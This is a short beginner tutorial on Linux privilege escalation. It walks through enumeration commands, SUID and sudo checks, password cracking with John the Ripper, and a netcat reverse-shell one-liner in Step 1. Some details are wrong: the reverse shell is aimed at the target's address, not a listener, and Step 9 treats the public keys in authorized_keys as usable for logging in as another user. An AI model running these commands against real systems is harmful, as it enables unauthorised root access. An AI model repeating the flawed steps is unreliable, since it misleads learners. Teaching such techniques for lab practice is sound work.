Linux Privilege Escalation for Beginners

Introduction

This tutorial covers the fundamentals of Linux privilege escalation, aimed at beginners who want to understand how to gain higher-level access within a Linux system. The techniques discussed are essential for ethical hacking, penetration testing, and security assessments. By the end of this guide, you'll have a solid foundation to explore further in the realm of cybersecurity.

Step 1: Gaining a Foothold

• Access the Shell: Start by obtaining shell access to the target system. This could be through methods like exploiting a vulnerability or using social engineering.
• Establish a Reverse Shell: Use a command to create a reverse shell to maintain access. Example command:

  nc -e /bin/sh target_ip target_port
  

Step 2: System Enumeration

• Check System Information: Use commands like uname -a to gather system information.
• Identify Running Services: Run ps aux to list all running processes and check for services that may have known vulnerabilities.

Step 3: User Enumeration

• List Users: Use the command cat /etc/passwd to display user information.
• Identify Privileged Users: Look for users in the sudo or wheel group, as these may have elevated privileges.

Step 4: Network Enumeration

• Check Open Ports: Use netstat -tuln to see which ports are open and which services are running on them.
• Identify Active Connections: Use lsof -i to list open files and their network connections.

Step 5: Password Enumeration

• Check for Passwords: Look for files that may contain sensitive information, such as shadow or passwd files.
• Use Tools: Tools like John the Ripper can be employed to crack passwords.

Step 6: Automated Tools Introduction

• Install Tools: Familiarize yourself with tools like LinPEAS and Linux Exploit Suggester.
• Run Tools: Execute these tools on the target system to automate the enumeration and vulnerability discovery processes.

Step 7: Kernel Exploits Overview

• Understand Kernel Versions: Use uname -r to find the kernel version and research known exploits for that version.
• Execute Kernel Exploits: If applicable, utilize payloads designed for kernel vulnerabilities.

Step 8: Escalation via Passwords and File Permissions

• Stored Passwords: Check for files containing stored passwords and exploit any weak credentials.
• Weak File Permissions: Identify files with overly permissive access by using ls -la.

Step 9: Escalation via SSH Keys

• Check for SSH Keys: Look for SSH keys in ~/.ssh/authorized_keys. If you find them, you can use them to gain access as another user.
• Copy SSH Keys: If you have access, copy the keys to your own system.

Step 10: Sudo Overview

• Review Sudo Permissions: Use the command sudo -l to see which commands the current user can run with sudo.
• Exploit Misconfigurations: If any commands are misconfigured, take advantage of that to escalate privileges.

Step 11: Escalation via SUID

• Identify SUID Files: Use find / -perm -4000 -type f 2>/dev/null to locate SUID files on the system.
• Exploit SUID Programs: If you find vulnerable SUID programs, execute them to gain root access.

Step 12: Challenge Walkthrough

• Practical Application: Follow through a practical challenge to apply what you've learned. Attempt to identify and exploit vulnerabilities as outlined in previous steps.

Conclusion

In this tutorial, we've covered the basics of Linux privilege escalation, including techniques for gaining access, enumerating systems and users, and exploiting vulnerabilities. As a next step, consider practicing these techniques in a controlled environment like a virtual lab or using platforms like Hack The Box. Continuous learning and hands-on practice are key to mastering Linux security.